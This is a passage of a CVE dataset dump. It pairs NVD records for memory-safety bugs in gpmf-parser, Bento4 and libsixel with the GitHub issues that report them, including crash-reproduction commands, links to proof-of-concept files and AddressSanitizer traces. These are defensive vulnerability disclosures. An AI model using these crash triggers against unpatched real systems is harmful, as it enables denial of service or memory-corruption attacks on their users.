[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gopro/gpmf-parser/issues/75" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gopro/gpmf-parser/issues/75" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gopro:gpmf-parser:1.2.3:*:*:*:*:*:*:*", "matchCriteriaId": "C4628685-F6D8-4FF2-9868-1CA7572DD943", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "125" ]
125
https://github.com/gopro/gpmf-parser/issues/75
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "gopro", "gpmf-parser" ]
Tested in Ubuntu 19.04, 64bit, master(ceb3815) compiled by gcc -g -fsanitize=address Triggered by $ gpmf-parse $POC [poc1.zip](https://github.com/gopro/gpmf-parser/files/3727770/poc1.zip) POC ``` root@ubuntu:/home/tim/gpmf-parser-asan/build# ./gpmf-parser crashes/karma.mp4-out_of_bound-idx\:0x32-0x1 STRM of ACCL of type s with 196 samples -- 3 elements per sample STRM of GYRO of type s with 392 samples -- 3 elements per sample STRM of ISOG of type f with 29 samples STRM of SHUT of type f with 29 samples STRM of FWVS of type c with 8 samples STRM of KBAT of type lLlsSSSSSSSBBBb with 1 sample -- 15 elements per sample STRM of GPRI of type JlllSSSSBB with 4 samples -- 10 elements per sample STRM of ATTD of type LffffffB with 4 samples -- 8 elements per sample STRM of GLPI of type LllllsssS with 4 samples -- 9 elements per sample STRM of VFRH of type ffffsS with 4 samples -- 6 elements per sample STRM of SYST of type JJ with 1 sample -- 2 elements per sample STRM of BPOS of type lllfffff with 2 samples -- 8 elements per sample STRM of ATTR of type Jffff with 4 samples -- 5 elements per sample STRM of SIMU of type Lsssssssss with 4 samples -- 10 elements per sample STRM of ESCS of type JSSSSSSSSssssSSSSSSSSSSSSSSSSB with 1 sample -- 30 elements per sample STRM of LNED of type Lffffff with 4 samples -- 7 elements per sample STRM of CYTS of type LLLLLfffBB with 4 samples -- 10 elements per sample STRM of CSEN of type LffffffLLLL with 4 samples -- 11 elements per sample MP4 Payload time 0.000 to 1.001 seconds GPRI 145.912s, 33.125deg, -117.331deg, 15.445m, 0.250m, 0.420m, 0.590m/s, 334.350deg, 3.000, 20.000, GPRI 146.312s, 33.125deg, -117.331deg, 15.367m, 0.250m, 0.420m, 1.240m/s, 325.640deg, 3.000, 20.000, GPRI 146.413s, 33.125deg, -117.331deg, 15.363m, 0.250m, 0.420m, 1.500m/s, 328.710deg, 3.000, 20.000, GPRI 146.710s, 33.125deg, -117.331deg, 15.331m, 0.250m, 0.420m, 2.510m/s, 330.990deg, 3.000, 20.000, ACCL sampling rate = 192.549209 Hz (from -0.135230 to 12.313536) GYRO sampling rate = 385.114885 Hz (from -0.136323 to 12.314507) ISOG sampling rate = 29.047875 Hz (from -0.113870 to 12.313889) SHUT sampling rate = 29.047875 Hz (from -0.113870 to 12.313889) FWVS sampling rate = 7.728535 Hz (from -0.159250 to 12.262250) KBAT sampling rate = 0.966067 Hz (from -0.159250 to 12.262250) GPRI sampling rate = 3.803888 Hz (from -0.050556 to 12.305222) ATTD sampling rate = 3.803888 Hz (from -0.050556 to 12.305222) GLPI sampling rate = 3.803888 Hz (from -0.050556 to 12.305222) VFRH sampling rate = 3.803888 Hz (from -0.050556 to 12.305222) SYST sampling rate = 0.966067 Hz (from -0.159250 to 12.262250) BPOS sampling rate = 0.905688 Hz (from -0.806867 to 12.442733) ATTR sampling rate = 3.803888 Hz (from -0.050556 to 12.305222) SIMU sampling rate = 3.803888 Hz (from -0.050556 to 12.305222) ESCS sampling rate = 0.966067 Hz (from -0.159250 to 12.262250) SCPR sampling rate = 0.490026 Hz (from 0.413947 to 12.658188) LNED sampling rate = 3.803888 Hz (from -0.050556 to 12.305222) CYTS sampling rate = 3.864268 Hz (from -0.159250 to 12.262250) ================================================================= ==64100==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61f000000c68 at pc 0x555d563d77bb bp 0x7ffd16ca7d60 sp 0x7ffd16ca7d50 READ of size 4 at 0x61f000000c68 thread T0 #0 0x555d563d77ba in GPMF_SeekToSamples /home/tim/gpmf-parser-asan/GPMF_parser.c:452 #1 0x555d563fc0ce in main /home/tim/gpmf-parser-asan/demo/GPMF_demo.c:247 #2 0x7f77d9928b6a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x26b6a) #3 0x555d563d4299 in _start (/home/tim/gpmf-parser-asan/build/gpmf-parser+0x2299) 0x61f000000c68 is located 0 bytes to the right of 3048-byte region [0x61f000000080,0x61f000000c68) allocated by thread T0 here: #0 0x7f77d9bf987e in __interceptor_realloc (/lib/x86_64-linux-gnu/libasan.so.5+0x10c87e) #1 0x555d563fc6f9 in GetPayload /home/tim/gpmf-parser-asan/demo/GPMF_mp4reader.c:64 #2 0x555d563fb611 in main /home/tim/gpmf-parser-asan/demo/GPMF_demo.c:102 #3 0x7f77d9928b6a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x26b6a) SUMMARY: AddressSanitizer: heap-buffer-overflow /home/tim/gpmf-parser-asan/GPMF_parser.c:452 in GPMF_SeekToSamples Shadow bytes around the buggy address: 0x0c3e7fff8130: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c3e7fff8140: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c3e7fff8150: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c3e7fff8160: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c3e7fff8170: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c3e7fff8180: 00 00 00 00 00 00 00 00 00 00 00 00 00[fa]fa fa 0x0c3e7fff8190: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c3e7fff81a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c3e7fff81b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c3e7fff81c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c3e7fff81d0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==64100==ABORTING ```
heapoverflow in GPMF_SeekToSamples GPMF_parse.c:452
https://api.github.com/repos/gopro/gpmf-parser/issues/75/comments
3
2019-10-15T07:11:52Z
2019-11-18T23:37:40Z
https://github.com/gopro/gpmf-parser/issues/75
507,052,169
75
947
CVE-2019-20090
2019-12-30T04:15:11.030
An issue was discovered in Bento4 1.5.1.0. There is a use-after-free in AP4_Sample::GetOffset in Core/Ap4Sample.h when called from Ap4LinearReader.cpp.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/461" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/461" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axiosys:bento4:1.5.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "83B32974-D913-4DDB-844F-C58D55ECC17E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "416" ]
416
https://github.com/axiomatic-systems/Bento4/issues/461
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "axiomatic-systems", "Bento4" ]
./mp42ts $poc out poc [test-002.zip](https://github.com/axiomatic-systems/Bento4/files/3938643/test-002.zip) asan output ``` root@ubuntu:/home/tim/Bento4/cmakebuild# ../../Bento4-asan/cmakebuild/mp42ts overflows/test-002.mp4-double_free-idx\:0xffffffff-0x0 out ================================================================= ==2623==ERROR: AddressSanitizer: heap-use-after-free on address 0x604000005458 at pc 0x55e3af247add bp 0x7ffd43666410 sp 0x7ffd43666400 READ of size 8 at 0x604000005458 thread T0 #0 0x55e3af247adc in AP4_Sample::GetOffset() const /home/tim/Bento4-asan/Source/C++/Core/Ap4Sample.h:99 #1 0x55e3af246319 in AP4_LinearReader::Advance(bool) /home/tim/Bento4-asan/Source/C++/Core/Ap4LinearReader.cpp:436 #2 0x55e3af246fa0 in AP4_LinearReader::ReadNextSample(unsigned int, AP4_Sample&, AP4_DataBuffer&) /home/tim/Bento4-asan/Source/C++/Core/Ap4LinearReader.cpp:532 #3 0x55e3af232717 in FragmentedSampleReader::ReadSample(AP4_Sample&, AP4_DataBuffer&) /home/tim/Bento4-asan/Source/C++/Apps/Mp42Ts/Mp42Ts.cpp:149 #4 0x55e3af232aa2 in ReadSample /home/tim/Bento4-asan/Source/C++/Apps/Mp42Ts/Mp42Ts.cpp:181 #5 0x55e3af233787 in WriteSamples /home/tim/Bento4-asan/Source/C++/Apps/Mp42Ts/Mp42Ts.cpp:306 #6 0x55e3af235970 in main /home/tim/Bento4-asan/Source/C++/Apps/Mp42Ts/Mp42Ts.cpp:636 #7 0x7fd67f91ab6a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x26b6a) #8 0x55e3af232459 in _start (/home/tim/Bento4-asan/cmakebuild/mp42ts+0x325459) 0x604000005458 is located 8 bytes inside of 48-byte region [0x604000005450,0x604000005480) freed by thread T0 here: #0 0x7fd67fdea845 in operator delete(void*, unsigned long) (/lib/x86_64-linux-gnu/libasan.so.5+0x10f845) #1 0x55e3af247c40 in AP4_LinearReader::SampleBuffer::~SampleBuffer() /home/tim/Bento4-asan/Source/C++/Core/Ap4LinearReader.h:104 #2 0x55e3af2466f5 in AP4_LinearReader::Advance(bool) /home/tim/Bento4-asan/Source/C++/Core/Ap4LinearReader.cpp:464 #3 0x55e3af246fa0 in AP4_LinearReader::ReadNextSample(unsigned int, AP4_Sample&, AP4_DataBuffer&) /home/tim/Bento4-asan/Source/C++/Core/Ap4LinearReader.cpp:532 #4 0x55e3af232717 in FragmentedSampleReader::ReadSample(AP4_Sample&, AP4_DataBuffer&) /home/tim/Bento4-asan/Source/C++/Apps/Mp42Ts/Mp42Ts.cpp:149 #5 0x55e3af232aa2 in ReadSample /home/tim/Bento4-asan/Source/C++/Apps/Mp42Ts/Mp42Ts.cpp:181 #6 0x55e3af233927 in WriteSamples /home/tim/Bento4-asan/Source/C++/Apps/Mp42Ts/Mp42Ts.cpp:317 #7 0x55e3af235970 in main /home/tim/Bento4-asan/Source/C++/Apps/Mp42Ts/Mp42Ts.cpp:636 #8 0x7fd67f91ab6a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x26b6a) previously allocated by thread T0 here: #0 0x7fd67fde917f in operator new(unsigned long) (/lib/x86_64-linux-gnu/libasan.so.5+0x10e17f) #1 0x55e3af245fa2 in AP4_LinearReader::Advance(bool) /home/tim/Bento4-asan/Source/C++/Core/Ap4LinearReader.cpp:424 #2 0x55e3af246fa0 in AP4_LinearReader::ReadNextSample(unsigned int, AP4_Sample&, AP4_DataBuffer&) /home/tim/Bento4-asan/Source/C++/Core/Ap4LinearReader.cpp:532 #3 0x55e3af232717 in FragmentedSampleReader::ReadSample(AP4_Sample&, AP4_DataBuffer&) /home/tim/Bento4-asan/Source/C++/Apps/Mp42Ts/Mp42Ts.cpp:149 #4 0x55e3af232aa2 in ReadSample /home/tim/Bento4-asan/Source/C++/Apps/Mp42Ts/Mp42Ts.cpp:181 #5 0x55e3af233927 in WriteSamples /home/tim/Bento4-asan/Source/C++/Apps/Mp42Ts/Mp42Ts.cpp:317 #6 0x55e3af235970 in main /home/tim/Bento4-asan/Source/C++/Apps/Mp42Ts/Mp42Ts.cpp:636 #7 0x7fd67f91ab6a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x26b6a) SUMMARY: AddressSanitizer: heap-use-after-free /home/tim/Bento4-asan/Source/C++/Core/Ap4Sample.h:99 in AP4_Sample::GetOffset() const Shadow bytes around the buggy address: 0x0c087fff8a30: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fd 0x0c087fff8a40: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fd 0x0c087fff8a50: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fd 0x0c087fff8a60: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fd 0x0c087fff8a70: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fd =>0x0c087fff8a80: fa fa fd fd fd fd fd fa fa fa fd[fd]fd fd fd fd 0x0c087fff8a90: fa fa fd fd fd fd fd fa fa fa fa fa fa fa fa fa 0x0c087fff8aa0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff8ab0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff8ac0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff8ad0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==2623==ABORTING root@ubuntu:/home/tim/Bento4/cmakebuild# ```
use after free in Ap4Sample.h
https://api.github.com/repos/axiomatic-systems/Bento4/issues/461/comments
0
2019-12-09T08:53:39Z
2019-12-09T08:53:39Z
https://github.com/axiomatic-systems/Bento4/issues/461
534,780,352
461
948
CVE-2019-20091
2019-12-30T04:15:11.123
An issue was discovered in Bento4 1.5.1.0. There is a NULL pointer dereference in AP4_Descriptor::GetTag in mp42ts when called from AP4_DecoderConfigDescriptor::GetDecoderSpecificInfoDescriptor in Ap4DecoderConfigDescriptor.cpp.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/462" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/462" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axiosys:bento4:1.5.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "83B32974-D913-4DDB-844F-C58D55ECC17E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/axiomatic-systems/Bento4/issues/462
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "axiomatic-systems", "Bento4" ]
./mp42ts $poc out poc [poc1.zip](https://github.com/axiomatic-systems/Bento4/files/3938679/poc1.zip) [poc2.zip](https://github.com/axiomatic-systems/Bento4/files/3938680/poc2.zip) asan output 1 ``` root@ubuntu:/home/tim/Bento4/cmakebuild# ../../Bento4-asan/cmakebuild/mp42ts crashes/test-001.mp4-signalb-0x0 out AddressSanitizer:DEADLYSIGNAL ================================================================= ==4527==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000008 (pc 0x5641267801c3 bp 0x7ffe30da6fb0 sp 0x7ffe30da6fa0 T0) ==4527==The signal is caused by a READ memory access. ==4527==Hint: address points to the zero page. #0 0x5641267801c2 in AP4_Descriptor::GetTag() (/home/tim/Bento4-asan/cmakebuild/mp42ts+0x3971c2) #1 0x5641267802af in AP4_DescriptorFinder::Test(AP4_Descriptor*) const (/home/tim/Bento4-asan/cmakebuild/mp42ts+0x3972af) #2 0x564126780d9c in AP4_List<AP4_Descriptor>::Find(AP4_List<AP4_Descriptor>::Item::Finder const&, AP4_Descriptor*&) const /home/tim/Bento4-asan/Source/C++/Core/Ap4List.h:431 #3 0x56412677fe05 in AP4_DecoderConfigDescriptor::GetDecoderSpecificInfoDescriptor() const /home/tim/Bento4-asan/Source/C++/Core/Ap4DecoderConfigDescriptor.cpp:159 #4 0x564126735776 in AP4_MpegSampleDescription::AP4_MpegSampleDescription(unsigned int, AP4_EsdsAtom*) /home/tim/Bento4-asan/Source/C++/Core/Ap4SampleDescription.cpp:591 #5 0x564126735f95 in AP4_MpegAudioSampleDescription::AP4_MpegAudioSampleDescription(unsigned int, unsigned short, unsigned short, AP4_EsdsAtom*) /home/tim/Bento4-asan/Source/C++/Core/Ap4SampleDescription.cpp:697 #6 0x56412673c990 in AP4_MpegAudioSampleEntry::ToSampleDescription() /home/tim/Bento4-asan/Source/C++/Core/Ap4SampleEntry.cpp:678 #7 0x5641267ddc0f in AP4_StsdAtom::GetSampleDescription(unsigned int) /home/tim/Bento4-asan/Source/C++/Core/Ap4StsdAtom.cpp:181 #8 0x56412676f4e0 in AP4_AtomSampleTable::GetSampleDescription(unsigned int) /home/tim/Bento4-asan/Source/C++/Core/Ap4AtomSampleTable.cpp:207 #9 0x564126745914 in AP4_Track::GetSampleDescription(unsigned int) /home/tim/Bento4-asan/Source/C++/Core/Ap4Track.cpp:445 #10 0x5641267113a0 in main /home/tim/Bento4-asan/Source/C++/Apps/Mp42Ts/Mp42Ts.cpp:563 #11 0x7fd96c6d3b6a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x26b6a) #12 0x56412670e459 in _start (/home/tim/Bento4-asan/cmakebuild/mp42ts+0x325459) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV (/home/tim/Bento4-asan/cmakebuild/mp42ts+0x3971c2) in AP4_Descriptor::GetTag() ==4527==ABORTING ``` 2 ``` root@ubuntu:/home/tim/Bento4/cmakebuild# ../../Bento4-asan/cmakebuild/mp42ts crashes/test-001.mp4-signalb-0x4 out AddressSanitizer:DEADLYSIGNAL ================================================================= ==4528==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000008 (pc 0x560f0b6bc1c3 bp 0x7ffc50b88480 sp 0x7ffc50b88470 T0) ==4528==The signal is caused by a READ memory access. ==4528==Hint: address points to the zero page. #0 0x560f0b6bc1c2 in AP4_Descriptor::GetTag() (/home/tim/Bento4-asan/cmakebuild/mp42ts+0x3971c2) #1 0x560f0b6bc2af in AP4_DescriptorFinder::Test(AP4_Descriptor*) const (/home/tim/Bento4-asan/cmakebuild/mp42ts+0x3972af) #2 0x560f0b6bcd9c in AP4_List<AP4_Descriptor>::Find(AP4_List<AP4_Descriptor>::Item::Finder const&, AP4_Descriptor*&) const /home/tim/Bento4-asan/Source/C++/Core/Ap4List.h:431 #3 0x560f0b6c3f1f in AP4_EsDescriptor::GetDecoderConfigDescriptor() const /home/tim/Bento4-asan/Source/C++/Core/Ap4EsDescriptor.cpp:207 #4 0x560f0b671417 in AP4_MpegSampleDescription::AP4_MpegSampleDescription(unsigned int, AP4_EsdsAtom*) /home/tim/Bento4-asan/Source/C++/Core/Ap4SampleDescription.cpp:583 #5 0x560f0b671f95 in AP4_MpegAudioSampleDescription::AP4_MpegAudioSampleDescription(unsigned int, unsigned short, unsigned short, AP4_EsdsAtom*) /home/tim/Bento4-asan/Source/C++/Core/Ap4SampleDescription.cpp:697 #6 0x560f0b678990 in AP4_MpegAudioSampleEntry::ToSampleDescription() /home/tim/Bento4-asan/Source/C++/Core/Ap4SampleEntry.cpp:678 #7 0x560f0b719c0f in AP4_StsdAtom::GetSampleDescription(unsigned int) /home/tim/Bento4-asan/Source/C++/Core/Ap4StsdAtom.cpp:181 #8 0x560f0b6ab4e0 in AP4_AtomSampleTable::GetSampleDescription(unsigned int) /home/tim/Bento4-asan/Source/C++/Core/Ap4AtomSampleTable.cpp:207 #9 0x560f0b681914 in AP4_Track::GetSampleDescription(unsigned int) /home/tim/Bento4-asan/Source/C++/Core/Ap4Track.cpp:445 #10 0x560f0b64d3a0 in main /home/tim/Bento4-asan/Source/C++/Apps/Mp42Ts/Mp42Ts.cpp:563 #11 0x7f5eaef1fb6a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x26b6a) #12 0x560f0b64a459 in _start (/home/tim/Bento4-asan/cmakebuild/mp42ts+0x325459) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV (/home/tim/Bento4-asan/cmakebuild/mp42ts+0x3971c2) in AP4_Descriptor::GetTag() ==4528==ABORTING ```
2 segv in mp42ts
https://api.github.com/repos/axiomatic-systems/Bento4/issues/462/comments
0
2019-12-09T09:00:42Z
2019-12-09T09:00:42Z
https://github.com/axiomatic-systems/Bento4/issues/462
534,783,741
462
949
CVE-2019-20094
2019-12-30T04:15:11.327
An issue was discovered in libsixel 1.8.4. There is a heap-based buffer overflow in the function gif_init_frame at fromgif.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/saitoha/libsixel/issues/125" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/saitoha/libsixel/issues/125" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libsixel_project:libsixel:1.8.4:*:*:*:*:*:*:*", "matchCriteriaId": "EB0720EA-8C4F-44BB-91C1-3098DA288118", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/saitoha/libsixel/issues/125
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "saitoha", "libsixel" ]
img2sixel -I $POC [smile.zip](https://github.com/saitoha/libsixel/files/3999231/smile.zip) asan output ``` root@ubuntu:/home/tim/libsixel/converters# ../../libsixel-asan/converters/img2sixel -I overflows/smile.gif-out_of_bound-idx\:0xa34-0x0 ================================================================= ==57335==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7f84cfa29e9c at pc 0x55fd2c49e55d bp 0x7ffe53350470 sp 0x7ffe53350460 WRITE of size 1 at 0x7f84cfa29e9c thread T0 #0 0x55fd2c49e55c in gif_init_frame /home/tim/libsixel-asan/src/fromgif.c:250 #1 0x55fd2c4a0cba in load_gif /home/tim/libsixel-asan/src/fromgif.c:644 #2 0x55fd2c49a9d0 in load_with_builtin /home/tim/libsixel-asan/src/loader.c:888 #3 0x55fd2c49b3a5 in sixel_helper_load_image_file /home/tim/libsixel-asan/src/loader.c:1392 #4 0x55fd2c44bd0c in sixel_encoder_encode /home/tim/libsixel-asan/src/encoder.c:1737 #5 0x55fd2c441e3b in main /home/tim/libsixel-asan/converters/img2sixel.c:457 #6 0x7f852961bb6a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x26b6a) #7 0x55fd2c43f7a9 in _start (/home/tim/libsixel-asan/converters/img2sixel+0x397a9) 0x7f84cfa29e9c is located 0 bytes to the right of 58156700-byte region [0x7f84cc2b3800,0x7f84cfa29e9c) allocated by thread T0 here: #0 0x7f8529af4448 in malloc (/lib/x86_64-linux-gnu/libasan.so.5+0x10c448) #1 0x55fd2c44204a in rpl_malloc /home/tim/libsixel-asan/converters/malloc_stub.c:45 #2 0x55fd2c44c995 in sixel_allocator_malloc /home/tim/libsixel-asan/src/allocator.c:155 #3 0x55fd2c49e1c5 in gif_init_frame /home/tim/libsixel-asan/src/fromgif.c:239 #4 0x55fd2c4a0cba in load_gif /home/tim/libsixel-asan/src/fromgif.c:644 #5 0x55fd2c49a9d0 in load_with_builtin /home/tim/libsixel-asan/src/loader.c:888 #6 0x55fd2c49b3a5 in sixel_helper_load_image_file /home/tim/libsixel-asan/src/loader.c:1392 #7 0x55fd2c44bd0c in sixel_encoder_encode /home/tim/libsixel-asan/src/encoder.c:1737 #8 0x55fd2c441e3b in main /home/tim/libsixel-asan/converters/img2sixel.c:457 #9 0x7f852961bb6a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x26b6a) SUMMARY: AddressSanitizer: heap-buffer-overflow /home/tim/libsixel-asan/src/fromgif.c:250 in gif_init_frame Shadow bytes around the buggy address: 0x0ff119f3d380: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0ff119f3d390: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0ff119f3d3a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0ff119f3d3b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0ff119f3d3c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0ff119f3d3d0: 00 00 00[04]fa fa fa fa fa fa fa fa fa fa fa fa 0x0ff119f3d3e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0ff119f3d3f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0ff119f3d400: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0ff119f3d410: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0ff119f3d420: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb 